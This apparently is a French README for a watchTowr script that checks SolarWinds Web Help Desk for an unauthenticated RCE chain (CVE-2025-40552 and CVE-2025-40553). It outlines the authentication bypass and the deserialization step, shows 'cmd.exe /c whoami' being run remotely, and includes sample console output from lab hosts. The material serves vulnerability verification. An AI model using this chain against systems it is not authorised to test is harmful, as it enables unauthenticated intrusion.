
Générateur d'artefacts de détection pour la chaîne RCE sans authentification de SolarWinds Web Help Desk (CVE-2025-40552 + CVE-2025-40553). Vérifie le contournement d'authentification et l'exécution de code à distance via l'exécution de requêtes SQL.
Outil de génération d'artefacts de détection pour la chaîne RCE sans authentification préalable de SolarWinds Web Help Desk
Ce générateur d'artefacts de détection vérifie si une instance de SolarWinds Web Help Desk est vulnérable aux CVE-2025-40552 et CVE-2025-40553.
Le générateur d'artefacts de détection tente d'effectuer deux opérations :
cmd.exe /c whoami - cette vérification n'est pas fiable à 100 %, car elle repose sur les messages d'erreur qui peuvent varier selon l'environnement.ATTENTION - lors du test de la RCE, le script créera une table SWWHDDAG<random_8_characters> dans la base de données postgres.
Après le test, vous pouvez vérifier si la sortie de la commande existe dans la base de données :
> SELECT * FROM public.swwhddagmm2t6t79
"output"
"nt authoritysystem"
Test contre une instance vulnérable :
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://vulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[+] VULNERABLE to CVE-2025-40552 Authentication Bypass
[+] Testing CVE-2025-40553 RCE
[+] This stage will create SWWHDDAGp08zwfs6 DB table if successful
[+] Verifying deserialization and serialization of org.apache.commons.dbcp2.BasicDataSource
[+] PROBABLY VULNERABLE: Connection validated and SQL queries can be executed
[+] Executing "cmd.exe /c whoami" - verify locally if it worked
Test contre une instance non vulnérable :
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://notvulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[-] NOT VULNERABLE to CVE-2025-40552, exiting
< SolarWinds Web Help Desk 2026.1
Références : https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
Pour les dernières recherches en sécurité, suivez l'équipe des laboratoires watchTowr